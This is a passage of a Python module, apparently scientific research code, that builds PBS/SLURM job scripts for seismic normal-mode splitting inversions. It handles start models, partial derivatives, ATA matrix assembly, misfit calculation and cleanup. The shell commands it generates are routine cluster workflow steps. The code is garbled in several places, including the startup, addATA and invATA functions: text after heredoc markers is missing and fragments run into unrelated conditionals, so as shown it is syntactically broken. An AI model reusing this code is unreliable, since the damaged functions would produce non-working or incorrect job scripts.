dst)\n\n # If segmentsdir is a file\n else:\n src = join(setup.segmentsdir)\n seg = setup.segmentsdir.split('/')[-1]\n cmt, ftype = seg.split('.')\n if ftype in accepted_ftypes and print_seg is True:\n if \"%s.cmt\" % cmt in os.listdir(default):\n dst = join(setup.rundir, seg)\n dst_all.append(dst)\n src_all.append(src)\n cp(src, dst)\n\n return src_all, dst_all\n\n\ndef submission(setup):\n \"\"\"\n Submits the pbs script to stig\n \"\"\"\n pbsrundir = pbsrundir_sanity_check(setup.rundir)\n msg = \"ssh stig 'cd %s; qsub qsub_me.pbs'\" % (pbsrundir)\n p = subprocess.Popen(msg, stdout=subprocess.PIPE, shell=True)\n (output, err) = p.communicate()\n if err is not None:\n raise RuntimeError(\"Submission Failed:\\n{}\".format(output))\n\n\ndef damping_file(setup, mdamp):\n modelfile = 'Cm1.dat'\n\n if setup.intype == 'CST':\n mfile = join(setup.rundir, modelfile)\n with open(mfile, 'w+') as fh:\n for key, val in mdamp['cst'].items():\n for v in val:\n fh.write('%s\\n' % v)\n\n if len(setup.modes_sc_dst) > 0:\n for key, val in mdamp['dst'].items():\n for v in val:\n fh.write('%s\\n' % v)\n return\n\n\ndef startmodel(setup):\n \"\"\"\n Setup of startmodel.\n creates the startfiles file in setup.rundir, reading from setup.mzero\n \"\"\"\n if setup.intype == 'CST':\n modelfile = 'mzero.dat'\n\n if setup.startmodel == 'S20RTS':\n if setup.intype == 'CST': # PREM & S20RTS are the same for cst\n mfile = join(setup.rundir, modelfile)\n with open(mfile, 'w+') as fh:\n for key, val in setup.mzero[\"cst\"].items():\n for v in val:\n fh.write('%s\\n' % v)\n\n if len(setup.modes_sc_dst) > 0:\n for key, val in setup.mzero[\"dst\"].items():\n for v in val:\n fh.write('%s\\n' % v)\n # To start, mcst.dat must be there too\n cp(mfile, join(setup.rundir, 'mcst.dat'))\n setup.model = mfile\n\n elif setup.intype == 'FSI':\n if setup.s_deg == 20:\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch')\n ):\n setup.model = '/quanta1/home/jagt/dta/S20RTS_MC.sph'\n else:\n setup.model = '/home/deuss/dta/S20RTS_MC.sph'\n elif setup.s_deg == 4:\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch')\n ):\n setup.model = '/quanta1/home/jagt/dta/S20RTS_l4.sph'\n else:\n setup.model = '/home/deuss/dta/S20RTS_l4.sph'\n else:\n pass\n\n elif setup.startmodel == 'PREM':\n if setup.intype == 'CST':\n mfile = join(setup.rundir, modelfile)\n with open(mfile, 'w+') as fh:\n for key, val in setup.mzero[\"cst\"].items():\n for v in val:\n fh.write('%s\\n' % v)\n if len(setup.modes_sc_dst) > 0:\n for key, val in setup.mzero[\"dst\"].items():\n for v in val:\n fh.write('%s\\n' % v)\n # To start from PREM, mcst.dat must be there too\n cp(mfile, join(setup.rundir, 'mcst.dat'))\n setup.model = mfile\n\n elif setup.intype == 'FSI':\n if setup.s_deg == 20:\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch')\n ):\n setup.model = '/quanta1/home/jagt/dta/mzero_l20.sph'\n else:\n setup.model = '/home/jagt/splitting/mzero_l20.sph'\n elif setup.s_deg == 4:\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch')\n ):\n setup.model = '/quanta1/home/jagt/dta/mzero_l4.sph'\n else:\n setup.model = '/home/jagt/splitting/mzero_l4.sph'\n else:\n pass\n else:\n if setup.intype == 'CST':\n mfile = join(setup.rundir, modelfile)\n with open(mfile, 'w+') as fh:\n for key, val in setup.mzero[\"cst\"].items():\n for v in val:\n fh.write('%s\\n' % v)\n if len(setup.modes_sc_dst) > 0:\n for key, val in setup.mzero[\"dst\"].items():\n for v in val:\n fh.write('%s\\n' % v)\n # To start from PREM, mcst.dat must be there too\n cp(mfile, join(setup.rundir, 'mcst.dat'))\n setup.model = mfile\n\n return\n\n\ndef get_damping_string(setup):\n damping = ''\n for d in setup.damping:\n damping += \"%4.2e \" % d\n return damping\n\n\ndef get_segments(seg_suffix):\n msg = ''\n msg += 'declare -a SEGMENTS='\n msg += '(`ls | egrep ^[0-9]*[A-Z].%s`)\\n' % seg_suffix\n return msg\n\n\ndef get_FILE_extension(seg_suffix):\n msg = \"${{FILE%%%%.%s}}\" % seg_suffix\n return msg\n\n\ndef dorun_preprundir(setup):\n msg = 'cp {zeromodel} .\\n'\n if setup.model.endswith('sph'):\n msg += '{sph2m} < mzero.dat\\n'\n msg += '{zeromdl}\\n'\n msg += 'EOF\\n'\n else:\n msg += 'cp {zeromodel} mzero.dat\\n'\n msg += 'cp mzero.dat mold.dat\\n'\n msg += '\\n'\n msg = msg.format(sph2m=join(setup.bindir, setup.bins.sph2m),\n zeromodel=setup.model,\n zeromdl=setup.model.split('/')[-1])\n return msg\n\n\ndef dorun_startup(setup):\n # Startmodel mzero.dat and mcst.dat are generated by create.startmodel\n msg = '#---------------------------#\\n'\n msg += '# STARTUP WITH ZERO MODEL #\\n'\n msg += '#---------------------------#\\n'\n msg += 'echo \"Starting up\" >> progress.out\\n'\n msg += 'rm inversion.dat inversion.out 2> /dev/null\\n'\n msg += 'rm dsyni.dat dsynr.dat dobsi.dat dobsr.dat mode.dat att.dat'\n msg += 'misfit.dat 2> /dev/null\\n'\n\n if setup.intype == 'CST':\n m = 'cp mzero.dat mcst.dat\\n\\n'\n m += '{rot_ellip}\\n'\n m = m.format(rot_ellip=join(setup.bindir, setup.bins.rot_ellip))\n\n if len(setup.modes_sc_dst) > 0:\n m += '{write_dst} << EOF\\n'\n for mode, smax in setup.modes_sc.items():\n m += '%s\\n' % smax\n for mode, smax in setup.modes_sc_dst.items():\n m += '%s\\n' % smax\n m += 'EOF\\n\\n'\n m = m.format(write_dst=join(setup.bindir, setup.bins.write_dst))\n\n m += '{mdcpl} << EOF\\n'\n for mode, smax in setup.modes_sc.items():\n # /home/deuss/bin/matrixcst\n # maximum structural deg for every mode\n m += '0 %s\\n' % smax\n if hasattr(setup, 'modes_cc'):\n # /home/deuss/bin/matrixcstC\n for mode, s in setup.modes_cc.items():\n m += '%s %s\\n' % (s[0], s[1])\n m += 'EOF\\n'\n m = m.format(mdcpl=join(setup.bindir, setup.bins.mdcpl))\n\n if len(setup.modes_sc_dst) > 0:\n m += 'mv matrix.dat matrix-cst.dat\\n\\n'\n # /home/deuss/bin/matrixdst\n m += '{mdcplmq} << EOF\\n'\n for mode, smax in setup.modes_sc_dst.items():\n # /home/deuss/bin/matrixcst\n # maximum structural deg for every mode\n m += '2 %s\\n' % smax\n m += 'EOF\\n'\n m += 'mv matrix.dat matrix-dst.dat\\n\\n'\n m += '{addmdcplmq} << EOF\\n'\n m += 'matrix-cst.dat\\n'\n m += 'matrix-dst.dat\\n'\n m += 'EOF\\n'\n m = m.format(mdcplmq=join(setup.bindir, setup.bins.mdcplmq),\n addmdcplmq=join(setup.bindir, setup.bins.addmdcplmq))\n\n elif setup.intype == 'FSI':\n m = '{mdcpl} -model {zeromodel} < 1:\n msg += 'sed -i \"/$iterno $damp $SEGDIR $EVENT/s/$/ '\n msg += 'partials/\" $PO\\n'\n else:\n msg += 'sed -i \"/$iterno $damp $EVENT/s/$/ partials/\" $PO\\n'\n msg += 'rm Ar.dat Ai.dat allevents_partials 2> /dev/null\\n'\n\n for mode, smax in setup.modes_sc.items():\n # /home/deuss/bin/compu-deriv-cst\n # maximum structural deg for every mode\n msg += 'echo %s >> allevents_partials\\n' % smax\n\n if hasattr(setup, 'modes_cc'):\n # /home/deuss/bin/compu-deriv-cstC\n for mode, s in setup.modes_cc.items():\n msg += 'echo %s %s >> allevents_partials\\n' % (s[0], s[1])\n\n msg += 'for FILE in \"${{SEGMENTS[@]}}\"\\n'\n msg += 'do\\n'\n msg += 'echo '\n msg += get_FILE_extension(list(setup.seg_suffix.values())[0])\n msg += ' >> allevents_partials\\n'\n msg += 'done\\n'\n msg += '{partial_derivatives} < allevents_partials\\n'\n msg += 'count=`grep \"NaN\" Ai.dat | wc -l`\\n'\n msg += '[ ! $count == 0 ] && echo '\n msg += '\" -NaN found in \"'\n msg += '$SEGDIR/$EVENT \" Ai.dat\" >> progress.out && rm A* && '\n msg += '{partial_derivatives} < allevents_partials\\n\\n'\n msg = msg.format(partial_derivatives=join(setup.bindir,\n setup.bins.cst_partials))\n return msg\n\n\ndef dorun_dst_partials(setup):\n msg = '#----------------#\\n'\n msg += '# Dst Partials #\\n'\n msg += '#----------------#\\n'\n if setup.intype == 'CST':\n if len(setup.events) > 1:\n msg += 'sed -i \"/$damp $SEGDIR $EVENT/s/$/ dst-partials/\" $PO\\n'\n else:\n msg += 'sed -i \"/$damp $EVENT/s/$/ dst-partials/\" $PO\\n'\n msg += 'rm allevents_partials\\n'\n\n for mode, smax in setup.modes_sc_dst.items():\n msg += 'echo %s >> allevents_partials\\n' % smax\n\n msg += 'for FILE in \"${{SEGMENTS[@]}}\"\\n'\n msg += 'do\\n'\n msg += 'echo '\n msg += get_FILE_extension(list(setup.seg_suffix.values())[0])\n msg += ' >> allevents_partials\\n'\n msg += 'done\\n'\n msg += '{partial_derivatives} < allevents_partials\\n'\n msg += 'count=`grep \"NaN\" Ai.dat | wc -l`\\n'\n msg += '[ ! $count == 0 ] && echo '\n msg += '\" -NaN found in \"'\n msg += '$SEGDIR/$EVENT \" Ai.dat\" >> progress.out && rm A* && '\n msg += '{partial_derivatives} < allevents_partials\\n\\n'\n msg = msg.format(partial_derivatives=join(setup.bindir,\n setup.bins.dst_partials))\n return msg\n\n\ndef dorun_cst_partials_array(setup):\n msg = '#----------------#\\n'\n msg += '# Cst Partials #\\n'\n msg += '#----------------#\\n'\n\n if setup.intype == 'CST':\n if len(setup.events) > 1:\n msg += 'sed -i \"/$iterno $damp $SEGDIR $EVENT/s/$/ '\n msg += 'partials/\" $PO\\n'\n else:\n msg += 'sed -i \"/$iterno $damp $EVENT/s/$/ partials/\" $PO\\n'\n\n msg += 'rm Ar.dat Ai.dat allevents_partials 2> /dev/null\\n'\n\n for mode, smax in setup.modes_sc.items():\n # /home/deuss/bin/compu-deriv-cst\n # maximum structural deg for every mode\n msg += 'echo %s >> allevents_partials\\n' % smax\n if hasattr(setup, 'modes_cc'):\n # /home/deuss/bin/compu-deriv-cstC\n for mode, s in setup.modes_cc.items():\n msg += 'echo %s %s >> allevents_partials\\n' % (s[0], s[1])\n\n msg += 'echo $EVENT >> allevents_partials\\n\\n'\n msg += '{partial_derivatives} < allevents_partials\\n\\n'\n msg += 'count=`grep \"NaN\" Ai.dat | wc -l`\\n'\n msg += '[ ! $count == 0 ] && echo '\n msg += '\" -NaN found in \"'\n msg += '$SEGDIR/$EVENT \" Ai.dat\" >> $MAINDIR/progress.out && rm A* && '\n msg += '{partial_derivatives} < allevents_partials\\n\\n'\n msg = msg.format(partial_derivatives=join(setup.bindir,\n setup.bins.cst_partials))\n return msg\n\n\ndef dorun_dst_partials_array(setup):\n msg = '#----------------#\\n'\n msg += '# Dst Partials #\\n'\n msg += '#----------------#\\n'\n\n if setup.intype == 'CST':\n if len(setup.events) > 1:\n msg += 'sed -i \"/$damp $SEGDIR $EVENT/s/$/ dst-partials/\" $PO\\n'\n else:\n msg += 'sed -i \"/$damp $EVENT/s/$/ dst-partials/\" $PO\\n'\n\n msg += 'rm allevents_partials\\n'\n\n for mode, smax in setup.modes_sc_dst.items():\n msg += 'echo %s >> allevents_partials\\n' % smax\n\n msg += 'echo $EVENT >> allevents_partials\\n\\n'\n msg += '{partial_derivatives} < allevents_partials\\n\\n'\n msg += 'count=`grep \"NaN\" Ai.dat | wc -l`\\n'\n msg += '[ ! $count == 0 ] && echo '\n msg += '\" -NaN found in \"'\n msg += '$SEGDIR/$EVENT \" Ai.dat\" >> $MAINDIR/progress.out && rm A* && '\n msg += '{partial_derivatives} < allevents_partials\\n\\n'\n msg = msg.format(partial_derivatives=join(setup.bindir,\n setup.bins.dst_partials))\n return msg\n\n\ndef dorun_buildATA_array(setup):\n msg = '#--------------------#\\n'\n msg += '# Build ATA matrix #\\n'\n msg += '#--------------------#\\n'\n\n msg += 'if [ ! -f $EVENT.dat ]; then\\n'\n msg += \" suffix=`ls $EVENT.segment? | cut -d'.' -f2`\\n\"\n msg += 'else\\n'\n msg += ' suffix=dat\\n'\n msg += 'fi\\n'\n\n msg += 'N_seg=`cat $EVENT.$suffix | wc -l`\\n'\n msg += 'if [ ! $N_seg == 0 ]; then\\n'\n if setup.intype == 'CST':\n if len(setup.events) > 1:\n msg += 'sed -i \"/$iterno $damp $SEGDIR $EVENT/s/$/ '\n msg += 'buildATA/\" $PO\\n'\n else:\n msg += 'sed -i \"/$iterno $damp $EVENT/s/$/ buildATA/\" $PO\\n'\n\n msg += '{buildATA} << EOF\\n'\n msg += '100.0\\n'\n msg += 'EOF\\n'\n msg += 'fi\\n'\n msg = msg.format(buildATA=join(setup.bindir, setup.bins.buildATA))\n return msg\n\n\ndef dorun_fsi_partials(setup):\n msg = '\\n'\n msg += '#----------------#\\n'\n msg += '# FSI Partials #\\n'\n msg += '#----------------#\\n'\n msg += 'rm Ar.dat Ai.dat allevents\\n'\n msg += get_segments(list(setup.seg_suffix.values())[0])\n msg += 'for FILE in \"${{SEGMENTS[@]}}\"\\n'\n msg += 'do\\n'\n msg += 'echo '\n msg += get_FILE_extension(list(setup.seg_suffix.values())[0])\n msg += ' >> allevents\\n'\n msg += 'done\\n'\n msg += '{partial_derivatives} < allevents\\n'\n\n msg = msg.format(partial_derivatives=join(setup.bindir,\n setup.bins.fsi_partials))\n return msg\n\n\ndef dorun_fsi_partials_array(setup):\n msg = '#----------------#\\n'\n msg += '# Fsi Partials #\\n'\n msg += '#----------------#\\n'\n\n msg += 'rm Ar.dat Ai.dat allevents\\n'\n\n msg += 'echo $EVENT >> allevents\\n\\n'\n msg += '{partial_derivatives} < allevents\\n'\n\n msg += '\\n'\n msg += '#--------------------#\\n'\n msg += '# Build ATA matrix #\\n'\n msg += '#--------------------#\\n'\n msg += '{buildATA} << EOF\\n'\n msg += '1000.0\\n'\n\n msg += 'EOF\\n'\n\n msg = msg.format(buildATA=join(setup.bindir, setup.bins.buildATA),\n partial_derivatives=join(setup.bindir,\n setup.bins.fsi_partials))\n return msg\n\n\ndef dorun_buildATA(setup):\n msg = '\\n'\n msg += '#--------------------#\\n'\n msg += '# Build ATA matrix #\\n'\n msg += '#--------------------#\\n'\n if setup.intype == 'CST':\n msg += 'echo \" -buildATA\" >> progress.out\\n'\n msg += '{buildATA} << EOF\\n'\n if setup.intype == 'CST':\n msg += '100.0\\n'\n elif setup.intype == 'FSI':\n msg += '1000.0\\n'\n msg += 'EOF\\n\\n'\n msg = msg.format(buildATA=join(setup.bindir, setup.bins.buildATA))\n return msg\n\n\ndef dorun_addATA(setup, uncertainties=False):\n rundir = setup.rundir\n if rundir.startswith('//nfs'):\n rundir = rundir.replace('//nfs/stig/', '/home/')\n\n msg = '#--------------#\\n'\n msg += '# Adding ATA #\\n'\n msg += '#--------------#\\n'\n if setup.intype == 'CST': # for PBS array only\n if uncertainties is False:\n Ndir = '$RUNDIR/allevents'\n else:\n Ndir = '$set_name'\n\n # if len(setup.events) > 1:\n # msg += 'echo \" -addATA\" >> $RUNDIR/progress.out\\n'\n # msg += 'rm ATAmatrix.dat ATd.dat dTd.dat ATA.dat ATA.list\\n\\n'\n # msg += 'Nmodes={msize}\\n'\n # msg += 'echo \"$Nmodes\" > ATA.list\\n'\n # msg += 'Nevents=`cat %s | wc -l`\\n' % Ndir\n # msg += 'echo \"$(( Nevents-1 ))\" >> ATA.list\\n\\n'\n # msg += 'i=0\\n'\n # msg += 'for f in `cat %s | sed \"s/ /\\//g\"`; do\\n' % Ndir\n # msg += 'if [ $i -eq 0 ]; then\\n'\n # msg += ' cp $RUNDIR/$f/ATAmatrix.dat ATA.dat\\n'\n # msg += ' cp $RUNDIR/$f/ATd.dat .\\n'\n # msg += ' cp $RUNDIR/$f/dTd.dat .\\n'\n # msg += 'else\\n'\n # msg += ' echo $RUNDIR/$f/ATAmatrix.dat >> ATA.list\\n'\n # msg += ' echo $RUNDIR/$f/ATd.dat >> ATA.list\\n'\n # msg += ' echo $RUNDIR/$f/dTd.dat >> ATA.list\\n'\n # msg += 'fi\\n'\n # msg += 'i=$(( i+1 ))\\n'\n # msg += 'done\\n'\n # msg += '{addATA} < ATA.list\\n'\n #\n # else:\n # msg += 'echo \" -addATA\" >> $RUNDIR/progress.out\\n'\n # msg += 'rm ATAmatrix.dat ATd.dat dTd.dat ATA.dat ATA.list\\n\\n'\n # msg += 'Nmodes={msize}\\n'\n # msg += 'echo \"$Nmodes\" > ATA.list\\n'\n # msg += 'Nevents=`cat %s | wc -l`\\n' % Ndir\n # msg += 'echo \"$(( Nevents-1 ))\" >> ATA.list\\n\\n'\n # msg += 'i=0\\n'\n # msg += 'for f in `cat %s | sed \"s/ /\\//g\"`; do\\n' % Ndir\n # msg += 'if [ $i -eq 0 ]; then\\n'\n # msg += ' cp $RUNDIR/$f/ATAmatrix.datATA.dat\\n'\n # msg += ' cp $RUNDIR/$f/ATd.dat .\\n'\n # msg += ' cp $RUNDIR/$f/dTd.dat .\\n'\n # msg += 'else\\n'\n # msg += ' echo $RUNDIR/$f/ATAmatrix.dat >> ATA.list\\n'\n # msg += ' echo $RUNDIR/$f/ATd.dat >> ATA.list\\n'\n # msg += ' echo $RUNDIR/$f/dTd.dat >> ATA.list\\n'\n # msg += 'fi\\n'\n # msg += 'i=$(( i+1 ))\\n'\n # msg += 'done\\n'\n # msg += '{addATA} < ATA.list\\n'\n msg += 'echo \" -Adding ATA\" >> progress.out\\n'\n msg += 'python {addATA} $RUNDIR %s\\n' % Ndir\n msg += 'cp ATA.dat ATAmatrix.dat\\n'\n\n msg = msg.format(addATA='merge.py')\n\n elif setup.intype == 'FSI':\n splittingdir = setup.splittingdir\n if splittingdir.startswith('//nfs'):\n splittingdir = splittingdir.replace('//nfs/stig', '/home')\n if isinstance(setup.events, AttribDict):\n tot_ev = 0\n for segdir_name, allevents in setup.events.items():\n if tot_ev == 0:\n events = sorted(allevents)\n dir = '%s/%s/%s' % (splittingdir, segdir_name, events[0])\n msg += 'echo \" -addATA\" >> $RUNDIR/progress.out\\n'\n msg += 'rm ATAmatrix.dat ATd.dat dTd.dat ATA.dat\\n'\n msg += 'cp %s/ATAmatrix.dat %s/ATA.dat\\n' % (dir, rundir)\n msg += 'cp %s/ATd.dat %s/.\\n' % (dir, rundir)\n msg += 'cp %s/dTd.dat %s/.\\n\\n' % (dir, rundir)\n tot_ev += len(allevents)\n\n tot_segdir = 0\n for segdir_name, allevents in setup.events.items():\n events = sorted(allevents)\n if len(events) > 1 and tot_segdir == 0:\n msg += '{addATA} < 1 and tot_segdir > 0:\n for e in events:\n dir = '%s/%s/%s' % (splittingdir, segdir_name, e)\n msg += '%s/ATAmatrix.dat\\n' % (dir)\n msg += '%s/ATd.dat\\n' % (dir)\n msg += '%s/dTd.dat\\n' % (dir)\n tot_segdir += 1\n\n if len(events) > 1:\n msg += 'EOF\\n'\n\n msg += 'cp ATA.dat ATAmatrix.dat\\n'\n\n msg = msg.format(addATA=join(setup.bindir, setup.bins.addATA),\n msize=setup.model_size)\n return msg\n\n\ndef dorun_invATA(setup):\n msg = '#-------------------#\\n'\n msg += '# Build new Model #\\n'\n msg += '#-------------------#\\n'\n msg += 'echo \" -invATA\" >> progress.out\\n'\n msg += '{invATA} << EOF\\n'\n msg += '$damp\\n'\n msg += '0\\n'\n msg += 'EOF\\n'\n\n if setup.intype == 'FSI':\n # transform mnew.dat to spline format\n msg += '%s < 0:\n msg += 'echo \" -write_dst\" >> progress.out\\n'\n msg += '{write_dst} << EOF\\n'\n for mode, smax in setup.modes_sc.items():\n msg += '%s\\n' % smax\n for mode, smax in setup.modes_sc_dst.items():\n msg += '%s\\n' % smax\n msg += 'EOF\\n\\n'\n msg = msg.format(write_dst=join(setup.bindir,\n setup.bins.write_dst))\n\n msg += 'echo \" -matrixcst\" >> progress.out\\n'\n msg += '{mdcpl} << EOF\\n'\n for mode, smax in setup.modes_sc.items():\n # /home/deuss/bin/matrixcst\n # maximum structural deg for every mode\n msg += '0 %s\\n' % smax\n if hasattr(setup, 'modes_cc'):\n # /home/deuss/bin/matrixcstC\n for mode, s in setup.modes_cc.items():\n msg += '%s %s\\n' % (s[0], s[1])\n msg += 'EOF\\n'\n msg = msg.format(mdcpl=join(setup.bindir, setup.bins.mdcpl))\n\n if len(setup.modes_sc_dst) > 0:\n msg += 'mv matrix.dat matrix-cst.dat\\n\\n'\n # /home/deuss/bin/matrixdst\n msg += 'echo \" -matrixdst\" >> progress.out\\n'\n msg += '{mdcplmq} << EOF\\n'\n for mode, smax in setup.modes_sc_dst.items():\n # /home/deuss/bin/matrixcst\n # maximum structural deg for every mode\n msg += '2 %s\\n' % smax\n msg += 'EOF\\n'\n msg += 'mv matrix.dat matrix-dst.dat\\n\\n'\n\n msg += 'echo \" -addmdcplmq\" >> progress.out\\n'\n msg += '{addmdcplmq} << EOF\\n'\n msg += 'matrix-cst.dat\\n'\n msg += 'matrix-dst.dat\\n'\n msg += 'EOF\\n'\n msg = msg.format(mdcplmq=join(setup.bindir, setup.bins.mdcplmq),\n addmdcplmq=join(setup.bindir,\n setup.bins.addmdcplmq))\n\n msg += '\\n'\n msg += 'echo \" -matdiag\" >> progress.out\\n'\n msg += '{matdiag} << EOF\\n' # /home/deuss/bin/matdiag\n msg += '0\\n'\n msg += 'EOF\\n\\n'\n\n msg = msg.format(matdiag=join(setup.bindir, setup.bins.matdiag))\n\n if setup.intype == 'FSI':\n pbsrundir = pbsrundir_sanity_check(setup.rundir)\n\n msg += 'rm misfit.dat\\n'\n msg += 'rm dsyni.dat dsynr.dat dobsi.dat dobsr.dat misfit-mode.dat\\n'\n msg += '{mdcpl} -model {model} < 1:\n msg += 'PO=$MAINDIR/progress.out\\n'\n msg += 'sed -i \"/$iterno $damp $SEGDIR $EVENT/s/$/ '\n msg += 'synseis_inv/\" $PO\\n'\n else:\n msg += 'PO=$MAINDIR/progress.out\\n'\n msg += 'sed -i \"/$iterno $damp $EVENT/s/$/ synseis_inv/\" $PO\\n'\n\n msg += '{synseis_inv} $EVENT << EOF\\n'\n msg += 'rr.dat\\n'\n msg += 'rr1.dat\\n'\n msg += 'ww.dat\\n'\n msg += 'EOF\\n\\n'\n if uncertainties is False:\n msg += synseis_sanity_check(setup)\n\n msg = msg.format(synseis_inv=join(setup.bindir, setup.bins.synseis_inv))\n return msg\n\n\ndef synseis_sanity_check(setup):\n msg = 'count=`grep \"NaN\" \"$EVENT\".misfit | wc -l`\\n\\n'\n msg += 'if [ $count != 0 ]; then\\n'\n msg += '\\tstat=`grep -B 3 \"NaN\" \"$EVENT\".misfit'\n msg += \" | cut -d'-' -f1 | cut -d' ' -f1`\\n\"\n msg += '\\techo \"synseis -NaN found in Station: $SEGDIR/$EVENT '\n msg += '$stat\" >> $MAINDIR/progress.err\\n'\n if len(setup.events) > 1:\n msg += '\\tsed -i \"/$iterno $damp $SEGDIR $EVENT/s/$/ '\n msg += 'NaN found in Station: '\n msg += '$SEGDIR/$EVENT $stat/\" $PO\\n'\n else:\n msg += '\\tsed -i \"/$iterno $damp $EVENT/s/$/ NaN found in Station: '\n msg += '$EVENT $stat/\" $PO\\n'\n msg += '\\trm misfit.dat 2> /dev/null\\n'\n msg += '\\trm dsyni.dat dsynr.dat dobsi.dat dobsr.dat '\n msg += 'misfit-mode.dat 2> /dev/null\\n'\n msg += '\\tcd $MAINDIR\\n'\n msg += '\\texit 404\\n'\n msg += 'fi\\n\\n'\n\n msg = msg.format(synseis_inv=join(setup.bindir, setup.bins.synseis_inv))\n return msg\n\n\ndef dorun_misfits(setup):\n msg = '\\n'\n msg += '#--------------------#\\n'\n msg += '# Calculate misfit #\\n'\n msg += '#--------------------#\\n'\n if setup.intype == 'FSI':\n msg += '{avmisfit_allmodes}\\n'\n msg += 'echo \" -avmisfit\" >> progress.out\\n'\n msg += '{avmisfit}\\n' # /home/deuss/bin/avmisfit\n msg += 'echo \" -posteriorCd\" >> progress.out\\n'\n msg += '{posterioriCd}\\n' # /home/deuss/bin/posterioriCd\n msg += 'echo \" -inversion_summary\" >> progress.out\\n'\n msg += 'python {invout} $RUNDIR $iterno {summary_dir} {schema}\\n'\n msg += 'rm inversion.out 2> /dev/null\\n'\n # #### dorun-newC3 new end\n if setup.intype == 'CST':\n msg += 'cp mnew-error.dat mnew.dat\\n'\n msg += 'cp mnew.dat {summary_dir}/mnew-it\"$iterno\"-d\"$damp\".dat\\n'\n msg += 'cp mnew.dat mold.dat\\n'\n msg += 'cp mnew.dat mcst.dat\\n'\n elif setup.intype == 'FSI':\n msg += 'cp misfit.dat misfit_it${{iterno}}_d${{damp}}.dat\\n'\n msg += 'cp mnew.dat mnew_it${{iterno}}_d${{damp}}.dat\\n'\n msg += 'cp mnew.dat mold.dat\\n'\n\n msg = msg.format(avmisfit_allmodes=join(setup.bindir,\n setup.bins.avmisfit_allmodes),\n avmisfit=join(setup.bindir, setup.bins.avmisfit),\n posterioriCd=join(setup.bindir, setup.bins.posterioriCd),\n invout=\"write_inversion_out.py\",\n summary_dir=setup.inversion_outdir,\n schema=setup.schema)\n return msg\n\n\ndef dorun_misfits_array(setup, uncertainties=False):\n if uncertainties is True:\n setup.inversion_outdir = 'uncertainties'\n # In this case we use the same function for the startup and new runs\n msg = '\\n'\n msg += '#--------------------#\\n'\n msg += '# Calculate misfit #\\n'\n msg += '#--------------------#\\n'\n msg += 'echo \" -avmisfit\" >> progress.out\\n'\n if len(setup.events) > 1:\n msg += '{avmisfit_allmodes}\\n'\n msg += '{avmisfit}\\n' # /home/deuss/bin/avmisfit\n if len(setup.segmentsdir) > 1:\n for idir, s in enumerate(setup.segmentsdir.keys()):\n msg += 'python {invout} $RUNDIR $(($iterno-1)) '\n if uncertainties is True:\n msg2 = '{summary_dir} \"%s-$set_filename\"' % s\n else:\n msg2 = '{summary_dir} %s' % s\n if idir != 0:\n msg2 += ' no_summary'\n msg += msg2\n msg += '\\n'\n else:\n msg += 'python {invout} $RUNDIR $(($iterno-1)) {summary_dir}\\n'\n\n msg += '\\n'\n\n msg += 'if [[ ! $iterno -eq 1 ]]; then\\n'\n msg += 'echo \" -posteriorCd\" >> progress.out\\n'\n msg += '{posterioriCd}\\n' # /home/deuss/bin/posterioriCd\n msg += 'echo \" -inversion_summary\" >> progress.out\\n'\n msg += 'rm inversion.out 2> /dev/null\\n'\n msg += 'cp mnew-error.dat mnew.dat\\n'\n if setup.intype == 'CST':\n msg += 'cp mnew.dat mcst.dat\\n\\n'\n\n if uncertainties is False:\n msg += 'cp mnew.dat {summary_dir}/mnew-it\"$(($iterno-1))\"'\n msg += '-d\"$damp\".dat\\n'\n msg += 'cp mnew.dat mold.dat\\n\\n'\n msg = msg.format(avmisfit_allmodes=join(setup.bindir,\n setup.bins.avmisfit_allmodes),\n avmisfit=join(setup.bindir, setup.bins.avmisfit),\n posterioriCd=join(setup.bindir, setup.bins.posterioriCd),\n invout=\"write_inversion_out.py\",\n summary_dir=setup.inversion_outdir)\n return msg\n\n\ndef dorun_summary(setup, uncertainties=False):\n msg = '\\n'\n msg += '#---------------------#\\n'\n msg += '# INVERSION SUMMARY #\\n'\n msg += '#---------------------#\\n'\n if uncertainties is True:\n msg += 'cp mnew.dat {summary_dir}/mnew-it\"$(($iterno-1))\"'\n msg += '-d\"$damp\"-\"$set_filename\".dat\\n'\n else:\n msg += 'cp Cmatrix.dat {summary_dir}/'\n msg += 'Cmatrix-it\"$(($iterno-1))\"-d\"$damp\".dat\\n'\n msg += 'cp Rmatrix.dat {summary_dir}/'\n msg += 'Rmatrix-it\"$(($iterno-1))\"-d\"$damp\".dat\\n'\n if setup.keep_all_output is not True:\n msg += 'for mf in *.misfit; do cp $mf '\n msg += '{summary_dir}/${{mf%.misfit}}_d\"$damp\".misfit; done\\n'\n msg = msg.format(summary_dir=setup.inversion_outdir)\n return msg\n\n\ndef dorun_cleanup(setup):\n msg = 'rm inversion.dat *misfit* mdcpl.out *.bin mnew* Cmat* Rmat*\\n'\n if setup.keep_all_output is not True:\n msg += 'ls *dat | xargs -I {{}} find {{}} -type f -not -name '\n msg += \"'???????.dat' -delete \\n\"\n return msg\n\n\ndef dorun_SLURM_header(setup):\n pbsrundir = pbsrundir_sanity_check(setup.rundir)\n msg = '#!/bin/bash\\n'\n msg += '#SBATCH --exclusive\\n'\n msg += '#SBATCH --mem=200G\\n'\n msg += '#SBATCH --partition=%s\\n' % setup.partition\n msg += '#SBATCH --nodes=1\\n'\n msg += '#SBATCH --cpus-per-task=48\\n'\n msg += '#SBATCH --threads-per-core=2\\n'\n if setup.walltime is not None:\n msg += '#SBATCH --time=%s\\n' % setup.walltime\n else:\n msg += '#SBATCH --time=24:00:00\\n'\n msg += '#SBATCH --job-name=%s.job\\n' % setup.pbsjob\n # msg += '#SBATCH --output=%s/main.%%A.%%a.out\\n' % (pbsrundir)\n msg += '#SBATCH --error=%s/main.%%A.%%a.err\\n' % (pbsrundir)\n msg += '#SBATCH --export=all\\n'\n\n if hasattr(setup, 'pbsmail'):\n msg += '#SBATCH --mail-type=ALL\\n'\n msg += '#SBATCH --mail-user=%s\\n' % setup.pbsmail\n msg += 'RUNDIR=%s\\n' % pbsrundir\n return msg\n\n\ndef dorun_submission_header(setup, type='default', uncertainties=False):\n\n pbsrundir = pbsrundir_sanity_check(setup.rundir)\n\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch') or\n setup.scripttype == 'slurm'\n ):\n msg = '#!/bin/bash\\n'\n\n if type in ('default', 